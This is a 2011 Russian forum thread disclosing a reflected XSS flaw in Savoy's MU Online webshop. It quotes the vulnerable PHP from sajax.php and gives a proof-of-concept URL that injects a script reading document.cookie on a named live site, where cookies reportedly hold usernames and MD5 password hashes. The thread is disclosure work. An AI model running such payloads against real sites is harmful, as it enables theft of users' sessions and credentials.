Главная | Топ серверов | Скины | Регистрация | Вход | English Version Приветствую Вас Гость | Показать правый блок
[ Обновленные темы · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
[Other] Пассивная XSS в Savoy's mu online advanced webshop
VincentДата: Воскресенье, 31.07.2011, 23:48 | Сообщение # 1
Лейтенант
Группа: Проверенные
Сообщений: 43
Репутация: 6
Статус: Оффлайн
Собственно, баг нашёл ещё примерно год назад, но в паблике он так и не засветился...

Уязвимы все версии Savoy's mu online advanced webshop.

После входа в вебшоп под своим аккаунтом, он пишет ваш юзернейм и пароль (мд5) в куки.

Уязвимый код : *root*/inc/sajax.php

Code
if ($mode == "get") {
     // Bust cache in the head
     header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT");    // Date in the past
     header ("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
     // always modified
     header ("Cache-Control: no-cache, must-revalidate");  // HTTP/1.1
     header ("Pragma: no-cache");                          // HTTP/1.0
     $func_name = $_GET["rs"];
     if (! empty($_GET["rsargs"]))   
      $args = $_GET["rsargs"];
     else
      $args = array();
    }
    else {
     $func_name = $_POST["rs"];
     if (! empty($_POST["rsargs"]))   
      $args = $_POST["rsargs"];
     else
      $args = array();
    }
      
    if (! in_array($func_name, $sajax_export_list))
     echo "-:$func_name not callable";


Пруф :
Code
http://mu.smiley.lv/webshop/login.php?rs=<script>alert(document.cookie)</script>

Реклама


The bird of blablabla

Сообщение отредактировал Vincent - Воскресенье, 31.07.2011, 23:52
 
YuraДата: Понедельник, 01.08.2011, 17:28 | Сообщение # 2
Генерал-майор
Группа: Проверенные
Сообщений: 176
Репутация: 52
Статус: Оффлайн
Очень интересный момент, надо будет покопать дальше.

Спасибо!


////

Сообщение отредактировал Yura - Понедельник, 01.08.2011, 17:28
 
VincentДата: Среда, 10.08.2011, 18:54 | Сообщение # 3
Лейтенант
Группа: Проверенные
Сообщений: 43
Репутация: 6
Статус: Оффлайн
Этой ночью ещё гляну на некоторые популярные движки сайтов для MU (mmw, dsw, muweb), zweb, если дадут. Естественно, покопаюсь в вебшопе. Отпишусь либо ночью, либо днём.

Добавлено (10.08.2011, 18:54)
---------------------------------------------
Так понимаю, автор шопа вообще не предусматривал исползование уязвимой функции. Фиксить самому - лень, но это вовсе не сложно. Просто закоментить код....


The bird of blablabla

Сообщение отредактировал Vincent - Пятница, 05.08.2011, 16:40
 
SCHOKKДата: Среда, 26.10.2011, 18:14 | Сообщение # 4
Лейтенант
Группа: Проверенные
Сообщений: 42
Репутация: -20
Статус: Оффлайн
Это сильно серьёзно ? Что могут сделать ?

=))
 
  • Страница 1 из 1
  • 1
Поиск:

This page is designed to be viewed best with Chrome. Home Page MyMuWeb By Vaflan. Хостинг от uCoz.